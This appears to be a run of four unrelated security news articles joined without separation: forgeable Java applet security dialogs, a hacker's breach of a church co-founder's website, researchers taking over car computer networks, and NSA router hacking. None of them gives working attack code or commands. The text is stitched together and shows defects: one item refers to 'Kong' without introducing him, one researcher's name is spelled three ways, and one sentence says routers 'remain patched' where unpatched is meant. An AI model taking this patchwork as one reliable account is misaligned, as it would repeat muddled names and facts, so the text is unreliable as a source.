Researchers: Oracle’s Java Security Fails

Faced with an onslaught of malware attacks that leverage vulnerabilities and design weaknesses in Java, Oracle Corp. recently tweaked things so that Java now warns users about the security risks of running Java content. But new research suggests that the integrity and accuracy of these warning messages can be subverted easily in any number of ways, and that Oracle’s new security scheme actually punishes Java application developers who adhere to it.

Java’s security dialog box.

Running a Java applet now pops up a security dialog box that presents users with information about the name, publisher and source of the application. Oracle says this pop-up is designed to warn users of potential security risks, such as using old versions of Java or running applet code that is not signed from a trusted Certificate Authority.
Security experts differ over whether regular users pay any mind whatsoever to these warnings. But to make matters worse, new research suggests most of the information contained in the pop-ups can be forged by malware writers.
In a series of scathing blog posts, longtime Java developer Jerry Jongerius details the various ways that attackers can subvert the usefulness of these dialog boxes. To illustrate his point, Jongerius uses an applet obtained from Oracle’s own Web site — javadetection.jar — and shows that the information in two out of three of its file descriptors (the “Name” and “Location” fields) can be changed, even if the applet is already cryptographically signed.
“The bottom line in all of this is not the security risk of the errors but that Oracle made such incredibly basic ’101′ type errors — in allowing ‘unsigned information’ into their security dialogs,” Jongerius wrote in an email exchange. “The magnitude of that ‘fail’ is huge.”
Jongerius presents the following scenario in which an attacker might use the dialog boxes to trick users into running unsafe applets:
“Imagine a hacker taking a real signed Java application for remote desktop control / assistance, and placing it on a gaming site, renaming it ‘Chess’. An unsuspecting end user would get a security popup from Java asking if they want to run ‘Chess’, and because they do, answer yes — but behind the scenes, the end user’s computer is now under the remote control of a hacker (and maybe to throw off suspicion, implemented a basic ‘Chess’ in HTML5 so it looks like that applet worked) — all because Oracle allowed the ‘Name’ in security dialogs to be forged to something innocent and incorrect.”
Oracle has not responded to requests for comment. But Jongerius is hardly the only software expert crying foul about the company’s security prompts. Will Dormann, writing for the Carnegie Mellon University’s Software Engineering Institute, actually warns Java developers against adopting a key tenet of Oracle’s new security guidelines.

Oracle recommends that all Java applets be cryptographically signed regardless of the privileges required by the program. Unsigned Java applets will run within a web page with a scary red warning that, “Running this application may be a security risk.” One of Java’s most-touted features is a “sandbox” security mechanism that is supposed to prevent certain functions when the applet is sent as part of a Web page. But according to both Jongerius and Dormann, Oracle made the default behavior for signed code to be full access to the computer (essentially, negating the usefulness of the sandbox).
“What about Oracle’s vision of a Java future where every Java applet is signed?,” asks Dornan, a longtime security research with the Department of Homeland Security’s US Computer Emergency Readiness Team (US-CERT). “What this vision means is that every Java applet, which would be signed, would also now be in a state where it could be repurposed because it is now no longer restricted by the sandbox. A poorly designed sandboxed Java applet can’t do much of anything.  However, a poorly designed signed Java applet can do pretty much anything that native code can.”
Both Dorrmann and Jongerius offer a number of ideas that Oracle could use to remedy the situation. Only time will tell if the company will take notice of the recommendations. In the meantime, I’ll continue to urge regular Internet users to get rid of Java completely, or at least to disconnect the Java plugin from any Web browsers (obligatory disclaimer: this advice does not scale for business users, whose computers may rely on Java for specific applications).

'The Messiah' gives his reasons for hacking Sun Ho's site

A hacker who calls himself "The Messiah", and who hacked into the website of City Harvest Church (CHC) co-founder Sun Ho, has resurfaced with a Q&A site.

In the site, titled “8 questions with the Messiah”, the hacker — who revealed that he operates under the umbrella of hacking group "Anonymous Collective" -- said that Ho's website has very little security. It is something which he said is “horrifying” as the site is apparently responsible for the information of over 5,000 churchgoers.

“It took us less than 15 minutes to gain access,” he said.

The information he referred to included names, addresses, telephone numbers and passwords. Perhaps to show how insecure Ho's site is, the hacker said he intends to expose the information soon. However, revealing them now would be "rash", he added.

Kong and his deputies have been charged with the alleged misuse of church funds amounting to about $50 million; most of it went to Sun Ho’s singing career in the US. The trial is ongoing.

Hackers crack car systems wide open

As cars become more like PCs on wheels, what's to stop a hacker from taking over yours?

In recent demonstrations, hackers have shown they can slam a car's brakes on at freeway speeds, jerk the steering wheel and even shut down the engine - all from their laptop computers.

The hackers are publicising their work to reveal vulnerabilities present in a growing number of car computers. All cars and trucks contain from 20 to 70 computers. They control everything from the brakes to acceleration to the windows, and are connected to an internal network. A few hackers have recently managed to find their way into these intricate networks.

In one case, a pair of hackers manipulated two cars by plugging a laptop into a port under the dashboard where mechanics connect their computers to search for problems. Scarier yet, another group took control of a car's computers through cellular telephone and Bluetooth connections, the CD player and even the tyre pressure monitoring system.

SECURITY EXPERTS

To be sure, the “hackers” involved were well-intentioned computer security experts, and it took both groups months to break into the computers. And there have been no real-world cases of a hacker remotely taking over a car. But experts say high-tech hijackings will get easier as automakers give cars full internet access and add computer-controlled safety devices that take over driving duties, such as braking or steering, in emergencies.

Another possibility: A tech-savvy thief could unlock the doors and drive off with your vehicle.

Security research company CEO Rich Mogull commented: “The more technology they add to the vehicle, the more opportunities there are for that to be abused for nefarious purposes.

“History keeps showing us that anything with a computer chip in it is vulnerable.”

Over the past 25 years, car companies have gradually computerised functions such as steering, braking, accelerating and chaning gears. Electronic throttle position sensors, for instance, are more reliable than the old throttle cables. Electronic parts also reduce weight and help cars use less fuel - but the networks of little computers inside today's cars are fertile ground for hackers.

Charlie Miller, a security engineer for Twitter, and fellow hacker Chris Valasek, director of intelligence at a Pittsburgh computer security consulting firm, cracked the computer systems of a 2010 Toyota Prius and 2010 Ford Escape through ports used by mechanics - although, even with their expertise, it took them nine months to do it.

Valasek said: “We could control steering, braking, acceleration to a certain extent, the seat belts, lights, hooter, speedometer and even the fuel gauge.”

GOING PUBLIC

Their report, which included instructions on how to break into the cars' networks, was released at a hacker convention in August. They said they went public to draw attention to the problem and get automakers to fix it, saying car companies haven’t put any security measures on the diagnostic ports.

Ford wouldn't comment other than saying it took security seriously, and pointing out that Miller and Valasek needed physical access to the cars to hack in.

Toyota said it did have added security - which it continually tested to stay ahead of hackers; it said its computers were programmed to recognise rogue commands and reject them.

“We could have turned the brakes off.”

Two years ago, researchers at the University of Washington and University of California in San Diego did more extensive work, hacking their way into a 2009-model mid-sized car through its cellular, Bluetooth and other wireless connections - even the CD player.

Computer science professor Stefan Savage said he and other researchers could control nearly everything but the car's steering.

“We could have killed the engine. We could have engaged the brakes,” he said.

Savage wouldn't identify the make or model of the car they hacked into, but two people who knew about the resarch said the car was from General Motors and the researchers compromised the OnStar safety system, best known for using cellular technology to check on customers and call for help in a crash.

GM wouldn't comment on the research, but said it took security seriously and was putting strategies in place to reduce risk.

CLOSING THE LOOPHOLES

One of the people said GM engineers initially dismissed the researchers' work, but after reading the report, quickly moved to close loopholes that allowed access to the car's computers.

Savage doesn't think common criminals will be able to seize control of cars electronically anytime soon - it would take too much time, expertise, money and hard work to hack into the multitude of computer systems found in a modern car.

“You're talking about a rarefied group with the resources and wherewithal,” he said.

Instead, he believes basic theft is a more likely consequence of computerisation, with criminals being able to unlock doors remotely and then start and drive the car by hacking through the diagnostic port. Remote door unlocking could also lead to theft of packages, phones and other items stored in a car. - Sapa-AP

NSA Laughs at PCs, Prefers Hacking Routers and Switches for bugging

The NSA runs a massive, full-time hacking operation targeting foreign systems, the latest leaks from Edward Snowden show. But unlike conventional cybercriminals, the agency is less interested in hacking PCs and Macs. Instead, America’s spooks have their eyes on the internet routers and switches that form the basic infrastructure of the net, and are largely overlooked as security vulnerabilities.
Under a $652-million program codenamed “Genie,” U.S. intel agencies have hacked into foreign computers and networks to monitor communications crossing them and to establish control over them, according to a secret black budget document leaked to the Washington Post. U.S. intelligence agencies conducted 231 offensive cyber operations in 2011 to penetrate the computer networks of targets abroad.
This included not only installing covert “implants” in foreign desktop computers but also on routers and firewalls — tens of thousands of machines every year in all. According to the Post, the government planned to expand the program to cover millions of additional foreign machines in the future and preferred hacking routers to individual PCs because it gave agencies access to data from entire networks of computers instead of just individual machines.
Most of the hacks targeted the systems and communications of top adversaries like China, Russia, Iran and North Korea and included activities around nuclear proliferation.
The NSA’s focus on routers highlights an often-overlooked attack vector with huge advantages for the intruder, says Marc Maiffret, chief technology officer at security firm Beyond Trust. Hacking routers is an ideal way for an intelligence or military agency to maintain a persistent hold on network traffic because the systems aren’t updated with new software very often or patched in the way that Windows and Linux systems are.
“No on updates their routers,” he says. “If you think people are bad about patching Windows and Linux (which they are) then they are … horrible about updating their networking gear because it is too critical, and usually they don’t have redundancy to be able to do it properly.”
He also notes that routers don’t have security software that can help detect a breach.
“The challenge [with desktop systems] is that while antivirus don’t work well on your desktop, they at least do something [to detect attacks],” he says. “But you don’t even have an integrity check for the most part on routers and other such devices like IP cameras.”
Hijacking routers and switches could allow the NSA to do more than just eavesdrop on all the communications crossing that equipment. It would also let them bring down networks or prevent certain communication, such as military orders, from getting through, though the Post story doesn’t report any such activities. With control of routers, the NSA could re-route traffic to a different location, or even alter it for disinformation campaigns, such as planting information that would have a detrimental political effect or altering orders to re-route troops or supplies in a military operation.
According to the budget document, the CIA’s Tailored Access Programs and NSA’s software engineers possess “templates” for breaking into common brands and models of routers, switches and firewalls.
The article doesn’t say it, but this would likely involve pre-written scripts or backdoor tools and root kits for attacking known but unpatched vulnerabilities in these systems, as well as for attacking zero-day vulnerabilities that are yet unknown to the vendor and customers.
“[Router software is] just an operating system and can be hacked just as Windows or Linux would be hacked,” Maiffret says. “They’ve tried to harden them a little bit more [than these other systems], but for folks at a place like the NSA or any other major government intelligence agency, it’s pretty standard fare of having a ready-to-go backdoor for your [off-the-shelf] Cisco or Juniper models.”
Not all of the activity mentioned in the budget document involved remote hacking. In some cases, according to the document, the operations involved clandestine activity by the CIA or military intelligence units to “physically place hardware implants or software modifications” to aid the spying.
“Much more often, an implant is coded entirely in software by an NSA group called Tailored Access Operations (TAO),” the Post writes in its story about the document. “As its name suggests, TAO builds attack tools that are custom-fitted to their targets.”
A handful of security researchers have uncovered vulnerabilities in routers in recent years that could be used to do the kind of hacking described in the budget document.
In 2005, security researcher Mike Lynn found a serious vulnerability in Cisco IOS, the operating system running on millions of Cisco routers around the world.
Lynn discovered the vulnerability after his employer, Internet Security Systems, asked him to reverse-engineer the Cisco operating system to see if he could find security problems with it. Cisco makes the majority of the routers that operate the backbone of the internet as well as many company networks and critical infrastructure systems. The Cisco IOS is as ubiquitous in the backbone as the Windows operating system is on desktops.
The vulnerability Lynn found, in a new version of the operation system that Cisco planned to release at the time, would have allowed someone to create a router worm that would shut down every Cisco router through which it passed, bringing down a nation’s critical infrastructure. It also would have allowed an attacker to gain complete control of the router to sniff all traffic passing through a network in order to read, record or alter it, or simply prevent traffic from reaching its recipient.
Once Lynn found the vulnerability, it took him six months to develop a working exploit to attack it.
Lynn had planned to discuss the vulnerability at the Black Hat security conference in Las Vegas, until Cisco intervened and forced him to pull the talk under threat of a lawsuit.
But if Lynn knew about the vulnerability, there were likely others who did as well — including intelligence agencies and criminal hackers.
Source code for Cisco’s IOS has been stolen at least twice, either by entities who were interested in studying the software to gain a competitive advantage or to uncover vulnerabilities that would allow someone to hack or control them.
Other researchers have uncovered different vulnerabilities in other Cisco routers that are commonly used in small businesses and home offices.
Every year at computer security conferences around the world — including the Black Hat conference where NSA Director Keith Alexander presented a keynote this year — U.S. intelligence agencies and contractors from around the world attend to discover information about new vulnerabilities that might be exploited and to hire talented researchers and hackers capable of finding more vulnerabilities in systems.
In 2008, a researcher at Core Security Technologies developed a root kit for the Cisco IOS that was designed to give an attacker a persistent foothold on a Cisco router while remaining undetected.
According to the Post story, the NSA designs most of the offensive tools it uses in its Genie operation, but it spent $25.1 million in one year for “additional covert purchases of software vulnerabilities” from private malware vendors who operate on the grey market — closed markets that peddle vulnerabilities and exploits to law enforcement and intelligence agencies, as opposed to the black market that sells them to cyber criminals.
The price of vulnerabilities and exploits varies, depending on a number of factors. Vulnerabilities and exploits can sell for anywhere from $50,000 to more than a million, depending on the exclusivity of the purchase — some vulnerabilities are sold to multiple parties with the understanding that others are using it as well — and their ubiquity. A vulnerability that exists in multiple versions of an operating system is more valuable than a vulnerability that exists in just one version. A class of vulnerability that crosses multiple browser brands is also more valuable that a single vulnerability that just affects the Safari browser or Chrome.
The Stuxnet cyber weapon that was reportedly created by the U.S. and Israel to sabotage centrifuges used in Iran’s uranium enrichment program, used five zero-day exploits to spread itself among systems in Iran, including a rare exploit that attacked the .LNK function in multiple versions of the Windows operating system in order to spread the worm silently via infected USB sticks.
Ubiquitous router vulnerabilities are difficult to find since there are so many different configurations for routers and an attack that works against one router configuration might not work for another. But a vulnerability that affects the core operating system is much more valuable since it is less likely to be dependent on the configuration. Maiffret says there hasn’t been a lot of public research on router vulnerabilities but whenever someone has taken a look at them, they have found security holes in them.
“They’re always successful in finding something,” he says.
Once a vulnerability becomes known to the software maker and is patched, it loses its value. But because many users do not patch their systems, some vulnerabilities can be used effectively for years even after a patch is available. The Conficker worm, for example, continued to infect millions of computers long after Microsoft released a patch that should have stopped the worm from spreading.
Routers in particular often remain patched because system administrators don’t think they will be targeted and because administrators are concerned about network outages that could occur while the patch is applied or if the patch is faulty.